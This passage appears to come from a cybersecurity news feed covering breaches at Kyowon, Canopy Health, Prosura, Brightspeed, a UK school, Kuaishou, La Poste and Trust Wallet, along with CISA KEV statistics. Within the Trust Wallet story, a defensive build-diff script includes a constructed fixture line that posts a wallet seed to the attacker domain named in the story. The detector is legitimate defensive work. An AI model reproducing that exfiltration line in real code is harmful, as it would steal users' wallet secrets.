Further disclosures revealed that Kyowon Group believes the incident may be linked to ransomware activity. On Monday, the company said it had shut down parts of its internal network after detecting what it described as suspicious behavior consistent with a ransomware attack. Kyowon Group explained that abnormal activity was first identified at approximately 8 a.m. on Saturday, January 10, prompting immediate action to isolate affected systems and block external access.  Several websites operated by Kyowon Group affiliates remained inaccessible as of Monday. A notice on the Kyowon Tour website confirmed that the service was unavailable. These disruptions highlighted the broad operational impact of the Kyowon Group hacking incident, which affected multiple brands under the group’s umbrella.  Kyowon Group reported the suspected breach to the Korea Internet & Security Agency (KISA) and relevant investigative authorities shortly after identifying the issue. The company said it is currently restoring systems while conducting comprehensive security checks to determine the scope of the intrusion. 

Company Reports Incident to Authorities, Probes Possible Ransomware Involvement 

“We are working with professional security personnel and related agencies to conduct a detailed investigation into the cause of the breach, the scope of its impact, and whether any data was affected, while carrying out recovery work,” Kyowon Group said in an official statement. The company also addressed concerns over customer data, stating, “We are also checking whether any personal information was leaked. If a leak is confirmed, we will promptly and transparently notify customers in accordance with relevant laws and procedures.”  Kyowon Group added that it plans to gradually restore access to its websites and related services as systems are secured. “We will mobilize all available resources to stabilize services and prioritize customer protection as we work toward full recovery,” the company said.  The cyberattack on Kyowon Group is particularly important given the group’s diverse business portfolio and large customer base. Kyowon Group operates education-focused brands such as Kyowon Kumon and Red Pen, which provide after-school learning materials. It also runs lifestyle and service-oriented businesses, including the Wells home appliance brand, Kyowon Life, a funeral service company, Kyowon Invest, Kyowon Travel, The Suites Hotel, and Kyowon Tour. 

Canopy Health Confirms Cyberattack, Patients Not Notified for Six Months

Canopy Health data breach

Canopy Health has confirmed it suffered a serious cyber intrusion that went undisclosed to patients for six months. The delayed notification has triggered anger and deep concern among those affected, many of whom say the Canopy Health data breach has eroded their confidence in health providers and the systems meant to protect sensitive personal information. The Canopy Health cyberattack was publicly acknowledged this week after months of behind-the-scenes investigation. In an update posted on its website, Canopy Health said it identified the incident on 18 July 2025, when it detected that an unknown person had “temporarily obtained unauthorized access” to part of its internal systems used by its administration team. Following a forensic investigation conducted by external cybersecurity experts, the organization said it had been advised that “unauthorized access to one of our servers likely occurred, and some data may have been copied.” Canopy Health added that the incident had since been contained, but confirmed the investigation was ongoing.

Patients React to the Canopy Health Data Breach 

According to Radio New Zealand, a woman who requested anonymity said she only learned about the Canopy Health data breach after receiving an email from the company this week. “Six months is an outrageous amount of time to keep the breach secret,” she said.  She had previously been referred to one of Canopy Health’s clinics for mammograms under the government-funded national breast screening program, BreastScreen Aotearoa, and had also used its diagnostic imaging services. The woman said the email she received claimed there was “no indication that any credit card, banking information or identity documents were affected.” However, she noted this appeared to contradict Canopy Health’s website statement, which acknowledged hackers may have “accessed a small number of bank account numbers.”  The woman, who is also a user of the Manage My Health platform, said that beyond what she described as “obviously inadequate data security systems,” the slow and unclear communication from both companies was “completely unacceptable.” “I am angry, and my confidence in health services and data security in this country is at an all-time low,” she said. 

Concerns Over Financial and Identity Information 

Another Auckland resident, also granted anonymity by RNZ, said she was referred to Canopy Health for a mammogram through BreastScreen Aotearoa and only received a letter about the breach in mid-December. “It was definitely not acceptable that this happened in July, but I only received a letter months later,” she said. “I would never have known if they had not sent that letter. But in the period of time they’ve taken to send it to me, anything could have happened.”  She said she was not reassured by Canopy Health’s assertion that it was “unlikely” patients’ identities were at risk. “If any of my information were compromised in any way, it would affect me,” she said. “I don’t know what would be out there, especially with the job I do—what if it fell into the hands of the wrong person and was used against me?”  Under a Q&A section published on its website, Canopy Health said the hacker “may have accessed a small number of bank account numbers, which had been provided to Canopy for payment or refund purposes.” The company said it was “directly notifying potentially affected individuals” and added that it was “unlikely the threat actor can take significant action with these details, as sensitive bank account information is highly protected.” Patients concerned about the Canopy Health data breach were advised to contact their banks. 

Second Health Data Incident Raises Wider Questions 

The Canopy Health cyberattack comes amid heightened scrutiny of data security in the health sector. In late December, patient portal provider Manage My Health confirmed it had identified a separate security incident involving unauthorized access to its platform. The company said between 6 and 7 percent of its approximately 1.8 million registered users may have been affected.  Manage My Health later said more than half of impacted patients had received notification emails, and that unaffected users could see their status within the app. Of the roughly 125,000 patients affected by the ransomware attack, more than 80,000 are based in Northland—the only region where Health NZ uses Manage My Health to share hospital discharge summaries, outpatient clinic letters, and referral notifications with patients.  The operators of Manage My Health said they have received “independent confirmation” from IT experts that vulnerabilities in its code have now been fixed. Meanwhile, the fallout from the Canopy Health data breach and the broader Canopy Health cyberattack continues to raise serious questions about transparency, accountability, and the protection of patient data across the healthcare system. 

Australian Insurer Prosura Confirms Cyber Incident, Takes Online Services Offline Amid Investigation

Prosura cyberattack

Australian insurance provider Prosura is investigating a cyber incident after detecting unauthorized access to parts of its internal systems, which has resulted in fraudulent emails being sent to some customers. The Prosura cyberattack, identified in early January, led the insurer to temporarily shut down key online services while it works to secure its systems and determine the full extent of the breach.  Prosura confirmed that it first identified the cyberattack on Prosura on January 3, 2026. In a media statement, the company said it discovered “unauthorized access to parts of our systems” and acted immediately to limit further risk.  “As a precaution, we have temporarily disabled the ability to purchase a policy, submit or manage a claim, or administer an existing policy via our self-service portal while we investigate and secure our environment,” Prosura said.  A subsequent Security Incident Update issued on Thursday, 8 January, provided additional clarity. According to the insurance provider, an unknown third party gained unauthorized access to a portion of its internal IT systems. Prosura also acknowledged that it was aware of online activity related to the incident and was prioritizing efforts to verify those claims.  While services remain offline, Prosura said it is conducting an urgent review of its systems and deploying additional security measures to prevent a recurrence of the Prosura cyberattack. 

Fraudulent Emails Linked to the Prosura Cyberattack

Alongside the system intrusion, Prosura reported that some customers received fraudulent emails connected to their existing or completed policies. These messages may reference the cyberattack on Prosura and instruct recipients to contact a third-party email address. The insurer urged customers not to respond to these emails, not to contact any external addresses mentioned, and to avoid clicking on links or opening attachments in unexpected messages. Customers were also advised to remain alert to phishing attempts via email, phone calls, or text messages that may use personal information to appear legitimate.

Customer Information Potentially Impacted 

Based on its investigation so far, Prosura believes some customer data may have been accessed during the cyberattack. The information potentially affected includes names, email addresses, phone numbers, country of residence, travel destinations, invoicing and pricing details, as well as policy start and end dates.  For customers who have previously made claims, the breach may also have exposed additional claim-related information. This could include driver’s licenses and associated images that were submitted as part of supporting documentation.  Prosura noted that there is no evidence that payment data was compromised. “Importantly, there is no indication that payment information (including credit card details) have been accessed,” the company stated, adding that it does not store credit card details within its systems. 

Regulatory Notifications and Ongoing Response 

The insurance provider confirmed it has notified both the Australian Cyber Security Centre and the Office of the Australian Information Commissioner, and will alert other regulatory bodies as required. Prosura is also working with external cybersecurity specialists to investigate what happened, strengthen system security, and monitor for further developments.  “We are taking this incident extremely seriously. We will work with specialist cybersecurity experts to investigate what happened, secure our systems, and restore services safely,” the company said.  Despite the disruption, Prosura reassured customers that active policies remain valid. Policyholders with upcoming travel plans were advised that they can proceed as planned, as policy validity has not been affected by the incident. Customers needing claim support were instructed to contact Prosura directly via its official support email with “Claim” included in the subject line. 

Company Apology and Next Steps 

In a statement signed by Managing Director Mike Boyd, Prosura acknowledged the concern caused by the incident. “We know this is concerning, and we are sorry this has happened,” Boyd said. “Our focus is on protecting our customers, supporting those affected, and restoring services safely.”  Prosura said it will contact impacted parties directly once it confirms what information was involved and will provide further guidance and support as required. The company added that it will continue to issue updates as new facts emerge, noting that premature disclosures could lead to misinformation.  As the Prosura cyberattack investigation continues, the insurer has reiterated its advice for customers to stay vigilant, avoid suspicious communications, and rely only on official updates published through Prosura’s website and direct customer communications. 

Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack

7 January 2026 at 12:00

Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack

The hacking group Crimson Collective claims to have access to Brightspeed’s infrastructure and is disconnecting users from the company’s home internet services. The group made its latest claims in a post on Telegram yesterday. “Hey BrightSpeed, we disconnected alot of your users home internet.. they might be complaining you should check,” the Telegram post says. Asked by The Cyber Express how the group was able to do this, a Crimson Collective spokesperson replied, “we were able to do this with the access we had on their infrastructure,” suggesting that the extent of the claimed breach may go beyond customer data access. The Cyber Express reached out to Brightspeed to see if the company could confirm or deny Crimson Collective’s claims and will update this article with any response. So far the company has said only that it is “investigating reports of a cybersecurity event,” so any claims by the hacker group remain unconfirmed.

Crimson Collective’s Brightspeed Claims and Customer Risk

In a January 4 Telegram post, Crimson Collective claimed that the group had breached Brightspeed and obtained the personal data of more than a million residential customers of the U.S. fiber broadband provider. A day later, the threat group released a data sample to back up those claims. The group is also trying to sell the data, suggesting that any negotiations that may have taken place with Brightspeed had failed to progress. Crimson Collective claims to possess a wide range of data on Brightspeed customers, including names, email addresses, phone numbers, billing and service addresses, account status, network type, service instances, network assignments, IP addresses, latitude and longitude coordinates, payment history, payment card types and masked card numbers (last 4 digits), expiry dates, bank identification numbers (BINs), appointment and order records, and more. The data doesn’t include password or full credit card numbers that could put users at imminent risk of breach or theft, but the hacker group told The Cyber Express that “Every PII is important, with all this data people can easily start big sophisticated phishing campaigns or even get access to specific people's infrastructure.” Noelle Murata, Senior Security Engineer at Xcape, agreed that the data holds potential value for cybercriminals. “The stolen data reportedly includes payment card details and account histories that create opportunities for identity theft and sophisticated social engineering scams and are particularly dangerous when targeting a demographic that may be less digitally savvy,” Murata said in a statement shared with The Cyber Express.

Crimson Collective: An Emerging Threat

Crimson Collective first emerged last year with a Red Hat GitLab breach that exposed client Customer Engagement Reports (CERs) and other potentially sensitive data about client infrastructure. Murata said the Brightspeed attack “aligns with the Crimson Collective's pattern of exploiting cloud misconfigurations and leaked AWS credentials to bypass security measures.” The timing of the attack, coming just after the New Year holiday, is a possible example of "holiday hunting," where cybercriminals exploit reduced IT staffing over holidays, Murata said. “Service providers in rural and suburban areas often operate with limited security resources but face the same threats as larger urban carriers,” Murata said. “Transparency, prompt customer notification, and immediate containment will be crucial in the coming days.”

A Cyberattack Was Part of the US Assault on Venezuela

6 January 2026 at 11:08

We don’t have many details:

President Donald Trump suggested Saturday that the U.S. used cyberattacks or other technical capabilities to cut power off in Caracas during strikes on the Venezuelan capital that led to the capture of Venezuelan President Nicolás Maduro.

If true, it would mark one of the most public uses of U.S. cyber power against another nation in recent memory. These operations are typically highly classified, and the U.S. is considered one of the most advanced nations in cyberspace operations globally.

Higham Lane School Cyberattack Disrupts IT Systems, Forcing Temporary Closure


A UK school cyberattack has forced a British secondary school to close its doors at the start of the new term, highlighting ongoing cybersecurity challenges across the education sector. Higham Lane School in Nuneaton, central England, confirmed that a cyber incident has disrupted its entire IT infrastructure, preventing students and staff from accessing essential digital services. The Higham Lane School cyberattack incident has left the school’s approximately 1,500 students unable to return to classrooms following the Christmas holidays. School officials confirmed that the campus will remain closed until at least Wednesday while investigations and recovery efforts continue.

Higham Lane School Cyber Incident Disrupts IT Systems

In an email sent to parents and carers, Higham Lane School stated that the cyberattack “has taken down the school IT system,” leaving staff without access to “any digital services including telephones / emails / servers and the school’s management system.” The outage has affected all internal communications and administrative functions, prompting school leaders to take the precautionary step of closing the site. Headteacher Michael Gannon detailed the situation in a formal letter to families, explaining the steps being taken to manage the incident. “We are writing to provide you with an update following the recent cyber incident that has affected our school,” the letter stated. “As you are aware, the school will be closed today, Monday 5th January, and will remain closed tomorrow, Tuesday 6th January, while we continue to respond to this situation.” The decision, according to the school, was made following advice from external experts. Higham Lane School is working with a Cyber Incident Response Team from the Department for Education, alongside IT specialists from its Multi Academy Trust, the Central England Academy Trust, to investigate and resolve the issue.

UK School Cyberattack: Students Advised Not to Access School Systems

As part of the response to the school IT system outage, staff and students have been instructed not to log into any school platforms, including Google Classroom and SharePoint, until further notice. The school emphasized that students who may have already accessed systems using their credentials should not worry, but added that the temporary restriction is necessary to ensure safety while the investigation continues. Despite the closure, students have been encouraged to continue learning independently using external platforms not connected to the school network. Resources such as BBC Bitesize and Oak National Academy were recommended, with the school noting that these services can be accessed safely using personal devices and home internet connections.

Education Sector Cybersecurity Under Growing Pressure

The Higham Lane School cyber incident comes amid rising concern over cybersecurity in schools, both in the UK and internationally. In October 2025, Kearney Public Schools (KPS) in the United States disclosed a cybersecurity incident that compromised its entire technology network, affecting phones, computers, and digital systems district-wide. The KPS cyberattack disrupted communications as students and staff prepared to return to classrooms, requiring support from external cybersecurity experts. In the UK, recent findings from the Information Commissioner’s Office (ICO) have drawn attention to another emerging risk: student-led insider cyber incidents. According to the regulator’s analysis of 215 personal data breach reports in the education sector, 57% of insider incidents over the past two years were linked to students. Nearly a third involved stolen login credentials, and in 97% of those cases, students were responsible. “It’s important that we understand the next generation’s interests and motivations in the online world to ensure children remain on the right side of the law,” said Heather Toomey, Principal Cyber Specialist at the ICO. She warned that behavior driven by curiosity or dares can escalate into serious cyber incidents, with potential consequences extending beyond school systems.

Weak Security Controls Amplify Risks

The ICO cited several cases where weak password practices, poor access controls, and limited monitoring created opportunities for misuse. In one secondary school, Year 11 students accessed sensitive data belonging to 1,400 pupils after cracking staff passwords. In another case, a student used a compromised staff login to alter and delete records for more than 9,000 individuals. As investigations continue at Higham Lane School, the UK school cyberattack incident serves as another reminder of the growing importance of education sector cybersecurity, particularly as schools remain heavily reliant on digital platforms for teaching, administration, and communication.

CISA Known Exploited Vulnerabilities Soared 20% in 2025

5 January 2026 at 16:31


After stabilizing in 2024, the growth of known exploited vulnerabilities accelerated in 2025. That was one conclusion from Cyble’s analysis of CISA’s Known Exploited Vulnerability (KEV) catalog data from 2025. After growing at roughly 21% in 2023, with 187 vulnerabilities added to the CISA KEV catalog that year, growth slowed to about 17% in 2024, with 185 vulnerabilities added. Growth in exploited vulnerabilities reaccelerated in 2025, with 245 vulnerabilities added to the KEV catalog, for a roughly 20% growth rate. The KEV catalog ended 2025 with 1,484 software and hardware flaws at high risk of attack. The 245 flaws added in 2025 are also more than 30% above the trend of 185 to 187 vulnerabilities added in each of the previous two years. Cyble also examined vulnerabilities exploited by ransomware groups, the vendors and projects with the most KEV additions (and several that actually improved), and the most common exploited software weaknesses (CWEs).

Older Vulnerabilities Added to CISA KEV Also Grew

Older vulnerabilities added to the CISA KEV catalog also grew in 2025, Cyble said. After adding an average of 65 older vulnerabilities to the KEV catalog in 2023 and 2024, CISA added 94 vulnerabilities from 2024 and earlier to the catalog in 2025, an increase of nearly 45% from the 2023-2024 average. The oldest vulnerability added to the KEV catalog last year was CVE-2007-0671, a Microsoft Office Excel Remote Code Execution vulnerability. The oldest vulnerability in the catalog remains CVE-2002-0367, a privilege escalation vulnerability in the Windows NT and Windows 2000 smss.exe debugging subsystem that has been known to be used by ransomware groups, Cyble said. CISA removed at least one vulnerability from the KEV catalog in 2025. CVE-2025-6264 is a Velociraptor Incorrect Default Permissions vulnerability that CISA determined had “insufficient evidence of exploitation,” Cyble noted.

Vulnerabilities Targeted in Ransomware Attacks

CISA marked 24 of the vulnerabilities added in 2025 as known to be exploited by ransomware groups, Cyble said. Those vulnerabilities include some well-known flaws such as CVE-2025-5777 (dubbed “CitrixBleed 2”) and Oracle E-Business Suite vulnerabilities targeted by the CL0P ransomware group. Vendors with multiple vulnerabilities targeted by ransomware groups included Fortinet, Ivanti, Microsoft, Mitel, Oracle and SonicWall.

Projects and Vendors with the Most Exploited Vulnerabilities

Microsoft once again led all vendors and projects in CISA KEV additions in 2025, with 39 vulnerabilities added to the catalog, up from 36 in 2024. Apple, Cisco, Google Chromium, Ivanti and Linux each had 7-9 vulnerabilities added to the KEV catalog. Several vendors and projects actually improved in 2025, with fewer vulnerabilities added than they had in 2024, “suggesting improved security controls,” Cyble said. Adobe, Android, Apache, Ivanti, Palo Alto Networks, and VMware were among those that saw a decline in KEV vulnerabilities.

Most Common Software Weaknesses

Eight software and hardware weaknesses (common weakness enumerations, or CWEs) were “particularly prominent among the 2025 KEV additions,” Cyble said, noting that the list is similar to the 2024 list. The most common CWEs in the 2025 CISA KEV additions were:
  • CWE-78 – OS Command Injection – accounted for 18 of the 245 vulnerabilities.
  • CWE-502 – Deserialization of Untrusted Data – was a factor in 14 of the vulnerabilities.
  • CWE-22 – Path Traversal – appeared 13 times.
  • CWE-416 – Use After Free – was a flaw in 11 of the vulnerabilities.
  • CWE-787 – Out-of-bounds Write – accounted for 10 of the vulnerabilities.
  • CWE-79 – Cross-site Scripting – appeared 7 times.
  • CWE-94 (Code Injection) and CWE-287 (Improper Authentication) appeared 6 times each.
 

Shai-Hulud Supply Chain Attack Drained $8.5 Million from Trust Wallet Users

31 December 2025 at 15:15


Trust Wallet users had $8.5 million in crypto assets stolen in a cyberattack linked to the second wave of the Shai-Hulud npm supply chain attack. In a lengthy analysis of the attack, Trust Wallet said attackers used the Shai-Hulud attack to access Trust Wallet’s browser extension source code and Chrome Web Store API key. “Using that access, they were able to prepare a tampered version of the extension with a backdoor designed to collect users’ sensitive wallet data [and] releasing the malicious version to the Chrome Web Store using the leaked (CWS) API key,” the crypto wallet company said. So far Trust Wallet has identified 2,520 wallet addresses affected by the incident and drained by the attackers, totaling approximately $8.5 million in assets. The company said it “has decided to voluntarily reimburse the affected users.” News of the successful attack comes amid reports that threat actors are actively preparing for a third wave of Shai-Hulud attacks.

Trust Wallet Shai-Hulud Attack Detailed

Trust Wallet said “an unauthorized and malicious version” of its Browser Extension (version 2.68) was published to the Chrome Web Store on December 24, “outside of our standard release process (without mandatory review). This version contained malicious code that, when loaded, allowed the attacker to access sensitive wallet data and execute transactions without authorization.”

The $8.5 million in assets were associated with 17 wallet addresses controlled by the attacker, but Trust Wallet said the attacker addresses “also drained wallet addresses NOT associated with Trust Wallet and this incident. We are actively tracking other wallet addresses that may have been impacted and will release updated numbers once we have confirmation.”

The incident affects only Trust Wallet Browser Extension version 2.68 users who opened the extension and logged in during the affected period of December 24-26. It does not affect mobile app users, users of other Browser Extension versions, or Browser Extension v2.68 users who opened and logged in after December 26 at 11:00 UTC. “If you have received an app push via the Trust Wallet mobile app or you see a security incident banner on your Trust Wallet Browser Extension, you may still be using the compromised wallets,” the company said. Browser Extension v2.68 users who logged into their wallets during the affected period were advised to transfer their funds from any at-risk wallets to a newly created wallet following the company’s instructions and to submit reimbursement claims at https://be-support.trustwallet.com.

White Hat Researchers Limited Damage with DDoS Attacks

The dramatic Trust Wallet attack was met by an equally dramatic response from white hat security researchers, who launched DDoS attacks on the attacker's infrastructure to limit damage, as detailed in the company’s update.

Trust Wallet’s developer GitHub secrets were exposed in the November second-wave attack, which gave the attacker access to the browser extension source code and the API key, allowing builds to be uploaded directly without Trust Wallet's internal approval and manual review. The attacker registered the domain metrics-trustwallet.com “with the intention of hosting malicious code and embedding a reference to that code in their malicious deployment of the Trust Wallet Browser Extension,” the company said. The attacker prepared and uploaded a tampered version of the browser extension using the codebase of an earlier version that they had accessed through the exposed developer GitHub secrets. The attacker published version 2.68 on the Chrome Web Store for review using the leaked CWS key, “and the malicious version was released automatically upon passing Chrome Web Store review approval,” Trust Wallet said.

On December 25, the first wallet-draining activity was publicly reported, when 0xAkinator and ZachXBT flagged the issues and identified the attacker's wallet addresses, and partner Hashdit and internal systems “notified us with multiple suspicious alerts.” “White-hat researchers initiated DDoS attacks in an attempt to temporarily disable the attacker's malicious domain, api.metrics-trustwallet.com, helping to minimize further victims,” Trust Wallet said. The company rolled back to a verified clean version (2.67, released as 2.69) and issued urgent upgrade instructions.
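The control that failed here is the link between what the internal release process approved and what the store actually serves: a leaked publishing key let a build reach users without the internal review. One check a practitioner can run is to diff the store-published package against the release artifact from the internal pipeline and inspect any added or changed script for hosts it was never meant to contact. The script below is an added example, not Trust Wallet's code. It assumes both builds are available as unpacked directories (a CRX can be unzipped), that the clean build's legitimate API host is known (EXPECTED_HOSTS is an assumed allowlist), and the two mini extensions built by demo() are constructed for the demonstration; the only real-world name in them is the malicious host the update above identifies.

```python
"""Diff a store-published extension against the internal release build.

Added example, not Trust Wallet's code. Both builds are assumed to be unpacked
directories; EXPECTED_HOSTS is an assumed allowlist of hosts the clean build
may reference. The extensions built by demo() are constructed for the demo.
"""
import hashlib
import os
import re
import tempfile

# Assumed allowlist: hosts the clean build is known to talk to (demo value).
EXPECTED_HOSTS = {"example-wallet-api.test"}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def file_hashes(root):
    """Map relative path -> SHA-256 of every file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def referenced_hosts(path):
    """Hostnames appearing in http(s) URLs inside a text file."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        return set(HOST_RE.findall(fh.read()))


def diff_builds(clean_dir, published_dir, expected_hosts=EXPECTED_HOSTS):
    """Return added/removed/modified files plus unexpected hosts in changed files."""
    clean, published = file_hashes(clean_dir), file_hashes(published_dir)
    added = sorted(set(published) - set(clean))
    removed = sorted(set(clean) - set(published))
    modified = sorted(p for p in clean.keys() & published.keys() if clean[p] != published[p])
    suspicious = {}
    for rel in added + modified:
        hosts = referenced_hosts(os.path.join(published_dir, rel)) - expected_hosts
        if hosts:
            suspicious[rel] = sorted(hosts)
    return {"added": added, "removed": removed, "modified": modified,
            "unexpected_hosts": suspicious}


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Build two constructed extensions (clean v2.67, tampered v2.68) and diff them."""
    base = tempfile.mkdtemp()
    clean, published = os.path.join(base, "v2.67"), os.path.join(base, "v2.68")
    for root in (clean, published):
        _write(root, "manifest.json", '{"name": "demo", "manifest_version": 3}')
        _write(root, "js/app.js", 'fetch("https://example-wallet-api.test/balance");')
    # Tampered build: app.js gains a loader, and a new script posts wallet data
    # to the domain named in Trust Wallet's incident update.
    _write(published, "js/app.js",
           'fetch("https://example-wallet-api.test/balance");\n'
           'import("./metrics.js");')
    _write(published, "js/metrics.js",
           'fetch("https://api.metrics-trustwallet.com/c", {method: "POST", body: seed});')
    return diff_builds(clean, published)


if __name__ == "__main__":
    print(demo())
```

Run this against every version the store serves, not only the one the pipeline just produced; a store listing that carries a version the pipeline never built is itself the alert, regardless of what the diff shows.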

Two Security Experts Plead Guilty in BlackCat Ransomware Case

30 December 2025 at 15:27


Two cybersecurity experts charged with deploying ALPHV BlackCat ransomware against five companies have pleaded guilty to federal charges in the case, the U.S. Department of Justice announced today. Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were indicted in the BlackCat ransomware case in October. Together with an unnamed co-conspirator, they “successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States,” the Justice Department said today. The two face sentencing in March for conspiring to obstruct commerce through extortion.

Misusing ‘Trusted Access and Technical Skill’

Martin and the co-conspirator worked as ransomware negotiators for DigitalMint, a Chicago-based company that specializes in mitigating cyberattacks, while Goldberg was an incident response manager at Sygnia Cybersecurity Services. DigitalMint and Sygnia have publicly stated they were not targets of the investigation and have cooperated fully with law enforcement. “These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop,” stated Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Goldberg and Martin used trusted access and technical skill to extort American victims and profit from digital coercion,” added U.S. Attorney Jason A. Reding Quiñones for the Southern District of Florida. “Their guilty pleas make clear that cybercriminals operating from within the United States will be found, prosecuted, and held to account.”

BlackCat Ransomware Case Netted More Than $1 million

According to the Justice Department, the three men agreed to pay the ALPHV BlackCat administrators a 20% share of any ransom payments they received in exchange for the ransomware and access to ALPHV BlackCat’s extortion platform. “After successfully extorting one victim for approximately $1.2 million in Bitcoin, the men split their 80% share of this ransom three ways and laundered the funds through various means,” the Justice Department said. The five unnamed victim companies targeted by the co-conspirators included:
  • A medical device company based in Tampa, Florida
  • A pharmaceutical company based in Maryland
  • A doctor’s office based in California
  • An engineering company based in California
  • A drone manufacturer based in Virginia
The Tampa medical device company paid a $1.27 million ransom; it is not clear if other ransom payments were made. The Justice Department placed the guilty pleas in the context of prior law enforcement actions aimed at disrupting ALPHV BlackCat, including the development of a decryption tool that the U.S. says saved global victims nearly $100 million in ransom payments. The Justice Department said Goldberg and Martin each pleaded guilty to one count of “conspiracy to obstruct, delay or affect commerce or the movement of any article or commodity in commerce by extortion in violation of 18 U.S.C. § 1951(a).” The defendants are scheduled to be sentenced on March 12, 2026, and face a maximum penalty of 20 years in prison. The cybersecurity industry has faced a number of insider incidents in recent months, including a “suspicious insider” at CrowdStrike and a former cybersecurity company official who pled guilty to stealing trade secrets to sell them to a Russian buyer. In the Goldberg and Martin case, corporate assets do not appear to have been misused.

Denmark Accuses Russia of Conducting Two Cyberattacks

23 December 2025 at 07:02

News:

The Danish Defence Intelligence Service (DDIS) announced on Thursday that Moscow was behind a cyber-attack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites in the lead-up to the municipal and regional council elections in November.

The first, it said, was carried out by the pro-Russian group known as Z-Pentest and the second by NoName057(16), which has links to the Russian state.

Slashdot thread.

Kuaishou Cyberattack Disrupts Livestreaming, Triggers Sharp Stock Decline

23 December 2025 at 02:06


Chinese short-video platform Kuaishou Technology saw its shares fall sharply after the company confirmed a cyberattack that briefly disrupted its livestreaming services, exposed users to inappropriate content, and rattled investor confidence. The Kuaishou cyberattack, which occurred late on Monday night, triggered the stock’s steepest single-day decline in more than two months and pushed it to its lowest level since late November. Shares of Hong Kong-listed Kuaishou Technology (HK:1024) fell by as much as 6% on Tuesday, dropping to HK$62.70 (approximately $8.06). This marked the company’s lowest share price since November 21 and represented its largest one-day percentage decline since October 14. The stock also emerged as the biggest decliner on the Hang Seng Tech Index, which itself fell about 0.5% on the day. Market reaction followed confirmation of a cyberattack on Kuaishou that disrupted its livestreaming function. As one of China’s largest short-video platforms and a close competitor to Douyin, the Chinese version of TikTok, Kuaishou’s performance is closely watched by investors. The sudden service disruption and reports of exposed content raised concerns about platform security and operational resilience.

Kuaishou Cyberattack Timeline

According to a company announcement issued on December 23, 2025, the Kuaishou cyberattack occurred at around 10:00 p.m. local time (14:00 GMT) on December 22, 2025. Cyberthreat actors targeted the live-streaming function of the Kuaishou app, temporarily interrupting services and exposing users to content described by some users as explicit and violent. Several reports characterized the incident as “unprecedented” for the platform. Kuaishou stated that it activated its emergency response plan immediately after detecting the cyberattack on Kuaishou. Following system repairs and restoration efforts, livestreaming services gradually resumed normal operations. The company noted that other services on the Kuaishou app were not affected by the incident, although some livestreaming functions continued to experience limited disruption during the recovery phase.

Company Response and Legal Actions 

In its press release, Kuaishou Technology said it had reported the incident to the police and relevant authorities and was pursuing further legal remedies. The company stated that it strongly condemns illegal and criminal activities linked to underground and gray industries and reiterated its opposition to any form of unlawful or harmful content. Kuaishou also said it remains committed to operating in compliance with applicable laws and regulations and to safeguarding the interests of the company and its shareholders. While livestreaming services have largely returned to normal, the cyberattack on Kuaishou highlighted the operational and reputational risks associated with large-scale social and live-commerce platforms.

Broader Security Concerns and Prior Data Leak Claims 

The recent cyberattack on Kuaishou has drawn renewed attention to earlier cybersecurity allegations involving the platform. In September, a threat actor on a known cybercrime forum claimed to have leaked order data allegedly stolen from Kuaishou. According to that claim, an attacker compromised a live broadcast room and used the access to place around 10,000 fraudulent orders for non-refundable virtual goods. The data allegedly leaked included usernames, phone numbers, addresses, and order details of affected users. If accurate, the incident would represent a multi-layered security breach involving unauthorized access, financial fraud, and the exposure of personally identifiable information.

Implications for Platform Security 

The December livestreaming Kuaishou cyberattack shows how attacks on social video and live-commerce platforms can quickly extend beyond service disruption to include content abuse, fraud, and potential data exposure, with immediate financial and regulatory impact. As Kuaishou works to restore stability and address security gaps, the incident stresses the need for early threat detection, rapid investigation, and continuous monitoring of underground activity.

La Poste Cyberattack Disrupts Postal and Banking Services in France Ahead of Christmas

23 December 2025 at 01:13


The La Poste cyberattack disrupted France’s national postal service just days before Christmas, temporarily knocking key websites and mobile applications offline and slowing parcel deliveries during one of the busiest periods of the year. La Poste confirmed that the incident was caused by a distributed denial-of-service (DDoS) attack, which impacted digital systems supporting postal operations. While the company stated there was no evidence that customer data had been compromised, it acknowledged that the cyberattack affected parcel distribution and access to online services. The timing of the La Poste cyberattack raised concerns among customers expecting holiday deliveries. Social media users reported delays and uncertainty around parcel arrivals, while French media outlets noted that some people attempting to send or collect packages were turned away from post offices operating under limited capacity. With Christmas being one of the most demanding periods for the postal network, even short-lived disruptions created visible operational challenges.

La Poste Cyberattack Linked to DDoS Incident

According to the company, the La Poste cyberattack involved a DDoS attack that overwhelmed parts of its digital infrastructure. As a result, several online platforms became unavailable, and some post offices were forced to operate at reduced capacity. Despite the disruption, customers were still able to carry out essential postal and banking transactions at physical counters. “Our teams are fully mobilised to restore services as quickly as possible,” La Poste said in its Twitter post, noting that remediation efforts were ongoing.

Cyberattack on La Poste Impacts La Banque Postale Services

The La Poste cyberattack also affected La Banque Postale, limiting customer access to online banking services and the bank’s mobile application. In a public statement shared on social media, the bank acknowledged the incident and assured customers that its teams were working to resolve the issue. “A computer incident has temporarily made access to our customers' mobile app and online banking unavailable. Our teams are working to resolve the situation as quickly as possible. Online payments are possible with SMS authentication,” the bank said. (Image: La Poste cyberattack statement; source: Twitter.) While digital access was disrupted, card payments at in-store terminals, ATM withdrawals, and SMS-authenticated online payments remained functional, reducing the impact on day-to-day financial transactions.

Recent Cyber Incidents in France

